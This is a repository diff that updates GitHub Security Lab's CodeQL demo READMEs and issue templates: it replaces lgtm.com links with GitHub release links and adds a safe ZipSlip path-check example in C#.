diff --git a/.github/ISSUE_TEMPLATE/all-for-one.yml b/.github/ISSUE_TEMPLATE/all-for-one.yml deleted file mode 100644 index 80c62dc..0000000 --- a/.github/ISSUE_TEMPLATE/all-for-one.yml +++ /dev/null @@ -1,90 +0,0 @@ -name: All for One, One For All bounty submission -description: Submit a CodeQL query for the All For One, One For All bounty (https://securitylab.github.com/bounties#allforone) -title: "[]: " -labels: [All For One] -body: - - type: markdown - attributes: - value: | - # Introduction - - Thank you for submitting a query to the GitHub CodeQL project! - - After you submit this issue, the GitHub Security Lab and CodeQL teams will triage the submission and, if it meets the Query Bounty Program requirements, we will grant you a bounty through our HackerOne program. - - Please make sure to carefully read the [bounty program description and conditions](https://securitylab.github.com/bounties#allforone) - - # Questionnaire - - type: input - id: pr_url - attributes: - label: Query PR - description: Link to pull request with your CodeQL query - placeholder: | - ex. https://github.com/github/codeql/pull/nnnn - validations: - required: true - - type: dropdown - id: language - attributes: - label: Language - description: What programming language is your query written for? - options: - - Java - - Javascript - - GoLang - - Python - - C/C++ - - C# - validations: - required: true - - type: textarea - id: cve_ids - attributes: - label: CVE(s) ID list - description: Enter a list of the CVE ID(s) associated with this query, one bullet for each distinct CVE. GitHub will automatically link CVE IDs to the [GitHub Advisory Database](https://github.com/advisories). If the result(s) is **NOT YET** fixed **nor disclosed**, and you are still waiting for a CVE, then you can privately share your result via email to [security@github.com](mailto:security@github.com?subject=[BugBounty]%20Issue%20#000%20useful%20result) - placeholder: | - ex. - - [CVE-20nn-xxxx]() - - [CVE-20nn-yyyy]() - validations: - required: true - - type: input - id: cwe - attributes: - label: CWE - description: "[CWE](https://cwe.mitre.org/data/index.html) that best fits the vulnerability class modeled with your query" - placeholder: | - ex. CWE-502: Deserialization of Untrusted Data - validations: - required: false - - type: textarea - id: report - attributes: - label: Report - description: Describe the vulnerability. Provide any information you think will help GitHub assess the impact your query has on the open source community. - placeholder: | - 1. What is the vulnerability? - 2. How does the vulnerability work? - 3. What strategy do you use in your query to find the vulnerability? - 4. How have you reduced the number of **false positives**? - 5. Other information? - validations: - required: true - - type: checkboxes - id: social - attributes: - label: Are you planning to discuss this vulnerability submission publicly? (Blog Post, social networks, etc). - description: We would love to have you spread the word about the good work you are doing - options: - - label: "Yes" - - label: "No" - validations: - required: true - - type: input - id: social_url - attributes: - label: Blog post link - description: If you have already blogged about your query, please provide a link. 
- validations: - required: false diff --git a/.github/ISSUE_TEMPLATE/bug-slayer.yml b/.github/ISSUE_TEMPLATE/bug-slayer.yml deleted file mode 100644 index f08489f..0000000 --- a/.github/ISSUE_TEMPLATE/bug-slayer.yml +++ /dev/null @@ -1,66 +0,0 @@ -name: The Bug Slayer bounty submission -description: Submit a CodeQL query for the Bug Slayer bounty (https://securitylab.github.com/bounties) -title: "[]: " -labels: [The Bug Slayer] -body: - - type: markdown - attributes: - value: | - # Introduction - - Thank you for your submission to the bounty program! - - After you submit this issue, the GitHub Security Lab and CodeQL teams will triage the submission and, if it meets the Query Bounty Program requirements, we will grant you a bounty through our HackerOne program. - - Please make sure to carefully read the [bounty program description and conditions](https://securitylab.github.com/bounties/) - - # Questionnaire - - type: textarea - id: cve_ids - attributes: - label: CVE(s) ID list - description: Enter a list of the CVE ID(s) associated with this query, one bullet for each distinct CVE. You need at least four high severity CVEs or two critical severity CVEs. - placeholder: | - ex. - - [CVE-20nn-xxxx]() - - [CVE-20nn-yyyy]() - validations: - required: true - - type: input - id: a41_url - attributes: - label: All For One submission - description: Link to the All For One submission with your CodeQL query - placeholder: | - ex. https://github.com/github/securitylab/issues/nnn - validations: - required: true - - type: textarea - id: details - attributes: - label: Details - description: Detail here how you found each CVE with your query. You can provide LGTM results, links to codeql DBs, ... anything that demonstrates that your query finds each CVE. - placeholder: | - ex. - - link/to/my/lgtm/runs - - link/to/gist/with/modified/query - - link/to/codeql/db - validations: - required: true - - type: checkboxes - id: social - attributes: - label: Are you planning to discuss this vulnerability submission publicly? (Blog Post, social networks, etc). - description: We would love to have you spread the word about the good work you are doing - options: - - label: "Yes" - - label: "No" - validations: - required: true - - type: input - id: social_url - attributes: - label: Blog post link - description: If you have already blogged about your query, please provide a link. - validations: - required: false diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml new file mode 100644 index 0000000..0489ed0 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml @@ -0,0 +1,59 @@ +name: CodeQL Wall of Fame submission +description: Propose an entry to the CodeQL Wall of Fame (https://securitylab.github.com/codeql-wall-of-fame) +title: "[wall-of-fame]: " +labels: [wall-of-fame] +body: + - type: markdown + attributes: + value: | + # Welcome! + + Thank you for submitting an entry for the CodeQL Wall of Fame! + + # Details + - type: input + id: date + attributes: + label: Date + description: Publication date of the blog post, in YYYY-MM-DD format + placeholder: | + ex. 
2023-01-01 + validations: + required: true + - type: input + id: title + attributes: + label: Title + description: Title of the blog post + validations: + required: true + - type: input + id: author + attributes: + label: Author + description: Author of the blog post + validations: + required: true + - type: input + id: url + attributes: + label: URL + description: URL of the blog post + validations: + required: true + - type: input + id: cve + attributes: + label: CVE + description: CVE ID(s), comma separated + placeholder: | + ex. CVE-2023-0001, CVE-2023-0002 + validations: + required: true + - type: textarea + id: description + attributes: + label: Description + description: Short summary of the blog post + validations: + required: true diff --git a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md index 8097be5..75f634d 100644 --- a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md +++ b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md @@ -1,3 +1 @@ -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/microsoft/chakracore/ChakraCore-revision-2017-April-12--18-13-26.zip) - -We now also have this query in our default suite: https://lgtm.com/rules/2156560627/ +Use [this snapshot](https://github.com/github/securitylab/releases/download/chakracore-codeql-database/ChakraCore-revision-2017-April-12--18-13-26.zip) diff --git a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md index e08808d..6790efd 100644 --- a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md +++ b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md @@ -1,5 +1,5 @@ # Facebook Fizz integer overflow vulnerability (CVE-2019-3560) -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo. +Use [this snapshot](https://github.com/github/securitylab/releases/download/facebook-codeql-database/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo. [Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://securitylab.github.com/research/facebook-fizz-CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/github/securitylab/tree/95c0bcc670f3b3d98a4d578f8993f8138092b94f/SecurityExploits/Facebook/Fizz/CVE-2019-3560). diff --git a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md index 545706d..5deeddc 100644 --- a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md +++ b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/qualcomm_copy_from_user) +[Blog post](https://securitylab.github.com/research/stack-buffer-overflow-qualcomm-msm/) -[Snapshot for this demo](https://downloads.lgtm.com/snapshots/cpp/qualcomm/msm/msm-4.4-revision-2017-May-07--08-33-56.zip) +[Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip) The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different than the blog post. 
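
For readers new to this bug class, here is a minimal, self-contained sketch of the tainted-size `copy_from_user` pattern that these demo queries look for. It is illustrative only, not code from the MSM sources: `handle_request`, `request`, and the user-space stub of `copy_from_user` are all made up for this example.

```cpp
#include <cstring>
#include <cstddef>

// Stub standing in for the kernel's copy_from_user(); returns 0 on success.
static int copy_from_user(void *dst, const void *src, std::size_t n) {
    std::memcpy(dst, src, n);
    return 0;
}

// Hypothetical ioctl-style argument: a length chosen by the caller.
struct request { std::size_t len; const void *data; };

int handle_request(const void *user_arg) {
    request req;
    char buf[64];

    // First copy: the caller controls every field of req, including req.len.
    if (copy_from_user(&req, user_arg, sizeof(req)))
        return -1;

    // BUG: req.len is never checked against sizeof(buf), so the second copy
    // can write past the end of the stack buffer. The missing guard is
    // `if (req.len > sizeof(buf)) return -1;`.
    if (copy_from_user(buf, req.data, req.len))
        return -1;

    return 0;
}
```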
diff --git a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md index b9f2ed7..042a1df 100644 --- a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md +++ b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782) +[Blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/) Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221). -[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug. +[This snapshot](https://github.com/github/securitylab/releases/download/xnu-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug. diff --git a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md index 7ca34fd..d8abe1c 100644 --- a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md +++ b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/apple_xnu_nfs_boot_CVE-2018-4136_CVE-2018-4160) +[Blog post](https://securitylab.github.com/research/apple-xnu-nfs-boot/) Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692). -[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug. +[This snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug. diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql index b34679d..8a11f96 100644 --- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql +++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql @@ -10,7 +10,7 @@ /* * This query is explained in detail in this blog post: * - * https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 + * https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/ * * It is based on the assumption that the function `m_mtod`, which returns * a pointer to the data stored in an `mbuf`, often returns a buffer diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md index cae2e9c..adbf857 100644 --- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md +++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md @@ -1,5 +1,5 @@ # Apple XNU icmp_error CVE-2018-4407 -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo. +Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo. -There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. 
But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://lgtm.com/blog/apple_xnu_icmp_nfs_pocs), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`. +There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://securitylab.github.com/research/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`. diff --git a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md index 58bc6be..9304638 100644 --- a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md +++ b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md @@ -1,4 +1,4 @@ -https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904 +https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/ There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5. @@ -8,6 +8,6 @@ For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it show `InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right hand side of the assignment to be zero, which means that the loop runs forever. -All three queries find results in [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13). +All three queries find results in [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13). -The queries also find results in [this newer snapshot for 10.13.3](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong. +The queries also find results in [this newer snapshot for 10.13.3](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong. 
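
As a hedged illustration of the loop shape that `InfiniteLoop.ql` is inspired by (a sketch, not the actual `packet_mangler.c` code; `walk_headers` is invented for this example):

```cpp
#include <cstdint>
#include <cstddef>

// The loop counter only advances via a compound assignment whose right-hand
// side is read from the packet itself. If an attacker makes that value zero,
// `offset` stops making progress and the loop never terminates.
void walk_headers(const uint8_t *pkt, size_t len) {
    size_t offset = 0;
    while (offset < len) {
        uint8_t step = pkt[offset]; // attacker-controlled length field
        // BUG: nothing rejects step == 0 before the compound assignment.
        offset += step;
    }
}
```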
diff --git a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
index 8e08a09..6605aa1 100644
--- a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
+++ b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
@@ -2,7 +2,7 @@ This demo is an example of variant analysis on a recent [bugfix](https://gith
The fix prevents an out-of-bounds access when processing malformed BMP files: when reading a BMP file, the library allocates a colour map based on the number of colours declared in the BMP header. Later on, individual bytes are read from the file and used as indices into this colour map. Previously, this was done without checking whether the byte actually represented a valid colour, which could cause an out-of-bounds access. The fix introduces a field in the same struct as the colour map that records its size, and checks the index against it, aborting with an error if the index is out of range.
-A snapshot of libjpeg-turbo from before the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip).
+A snapshot of libjpeg-turbo from before the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip).
The first five QL files develop a query that flags exactly the fixed accesses on the former snapshot, and nothing on the latter; the last query is a generalisation that finds a new instance of the same problem. All queries are run on the fixed snapshot, except when stated otherwise.
@@ -11,6 +11,6 @@ The first five QL files develop a query that flags exactly the fixed accesses on
- 02b_find_guarded_colormap_index_working.ql: The previous query doesn't actually work, since `ERREXIT` isn't recognised as being a non-returning macro. This query fixes that.
- 03_find_unguarded_colormap_index.ql: Flipping the logic around, we now look for _unguarded_ indexing. This gives a few false positives in cases where `cmap_length` isn't used. There is still a guard in these cases, but it's against a parameter that happens to contain the size of the colour map.
- 04_find_unguarded_colormap_no_fps.ql: Add inter-procedural tracking to reason about the flow of colour maps and their sizes. This eliminates the remaining FPs on the fixed snapshot, and gives the expected results on the original snapshot.
- - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip).
+ - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip).
Note that the final query is somewhat non-trivial (>100 LoC, uses global value numbering, guards and inter-procedural flow), so it's perhaps best used with an audience that has seen some simple QL before.
diff --git a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
index 2c2a630..4b595a5 100644
--- a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
+++ b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
@@ -1,9 +1,9 @@ # Eating error codes in libssh2
-Download this [snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
+Download this [snapshot](https://github.com/github/securitylab/releases/download/libssh2-codeql-database/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released.
-[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
+The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis.
diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
index 36c17f5..b03a616 100644
--- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
+++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140).
+[Blog post](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).
-This bug was found by one of our [default queries](https://lgtm.com/rules/1505913226124/). However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query.
+This bug was found by one of the default [CodeQL](https://codeql.github.com/) queries.
However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query. -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/rsyslog/rsyslog/rsyslog-all-revision-2018-April-27--14-12-31.zip). +Use [this snapshot](https://github.com/github/securitylab/releases/download/rsyslog-codeql-database/rsyslog-all-revision-2018-April-27--14-12-31.zip). diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt index f18de68..bf1f72b 100644 --- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt +++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt @@ -1168,7 +1168,7 @@ which is now included 285 00:16:24,478 --> 00:16:28,858 -in our default suite on lgtm.com. +in our default suite on lgtm.com (NOW DEPRECATED). 286 00:16:29,340 --> 00:16:32,231 diff --git a/CodeQL_Queries/csharp/ZipSlip/README.md b/CodeQL_Queries/csharp/ZipSlip/README.md index 03822bb..3d5209d 100644 --- a/CodeQL_Queries/csharp/ZipSlip/README.md +++ b/CodeQL_Queries/csharp/ZipSlip/README.md @@ -2,7 +2,7 @@ ## Snapshot -Use [this snapshot](http://downloads.lgtm.com/snapshots/csharp/microsoft/powershell/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip) +Use [this snapshot](https://github.com/github/securitylab/releases/download/powershell-codeql-database/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip) of PowerShell. ## Introduction @@ -15,14 +15,12 @@ they had written a basic query and run it against a number of critical codebases Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository. -It was deployed to [LGTM.com](https://lgtm.com) within 2 weeks where it was run over thousands of open source C# projects. +It was deployed to the now deprecated LGTM website within 2 weeks where it was run over thousands of open source C# projects. -Here are some [sample results](https://lgtm.com/rules/1506511188430/alerts/) for the ZipSlip query. -One of those projects was Microsoft PowerShell. +The CodeQL ZipSlip query found a vulnerability in Microsoft PowerShell. As a result of this query, [a senior Microsoft engineer](https://github.com/TravisEz13) -fixed this vulnerability in November 2018 in -[this PR](https://lgtm.com/projects/g/PowerShell/PowerShell/rev/b39a41109d86d9ba75f966e2d7b52b81fa629150). +fixed this vulnerability in November 2018. So how did they do it? @@ -48,5 +46,24 @@ This uses a global taint tracking configuration. # Final query -The [final query](https://lgtm.com/rules/1506511188430/) includes query help, and identifies various other sources and sinks, -but uses the same general structure. It also includes metadata for LGTM. +The final query below includes query help, and identifies various other sources and sinks, +but uses the same general structure. 
+
+```csharp
+using System.IO;
+using System.IO.Compression;
+class Good
+{
+    public static void WriteToDirectory(ZipArchiveEntry entry,
+                                        string destDirectory)
+    {
+        string destFileName = Path.GetFullPath(Path.Combine(destDirectory, entry.FullName));
+        string fullDestDirPath = Path.GetFullPath(destDirectory + Path.DirectorySeparatorChar);
+        if (!destFileName.StartsWith(fullDestDirPath)) {
+            throw new System.InvalidOperationException("Entry is outside the target dir: " +
+                                                       destFileName);
+        }
+        entry.ExtractToFile(destFileName);
+    }
+}
+```
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
index 99db29e..f53ac28 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
@@ -1,6 +1,6 @@
-[Blog post](https://lgtm.com/blog/apache_struts_CVE-2017-9805)
+[Blog post](https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/)
-[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-91ae344-CVE-2017-9805.zip) has the bug. Also, Mo has greated a copy of the project so that you can see [the result](https://lgtm.com/projects/g/mmosemmle/struts_9805/alerts/?mode=list&id=java%2Funsafe-deserialization) on [lgtm.com](https://lgtm.com/projects/g/mmosemmle/struts_9805).
+[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug.
This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`.
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
index eb5e7bd..e03b9a1 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
@@ -1,8 +1,8 @@
# Apache Struts CVE-2018-11776
-[Blog post](https://lgtm.com/blog/apache_struts_CVE-2018-11776)
+[Blog post](https://securitylab.github.com/research/apache-struts-CVE-2018-11776/)
-[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
+[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql index 55e2e08..9bc5cf4 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql @@ -89,10 +89,7 @@ class IsVarNameSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, Da } } -// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName: -// -// https://lgtm.com/projects/g/ether/etherpad-lite/rev/dd7894d3c9389a000d11d3a89962d9fcc9c6c44b -// +// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName. // This version of the query adds a sanitizer to exclude those results. from Configuration xss, DataFlow::PathNode source, DataFlow::PathNode sink where xss.hasFlowPath(source, sink) diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md index 95a12a7..ab633c3 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/etherpad_CVE-2018-6835) +[Blog post](https://securitylab.github.com/research/etherpad-reflected-file-download/) -[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) has the vulnerability. +[This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability. -For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip). +For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-patched-codeql-database/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip). diff --git 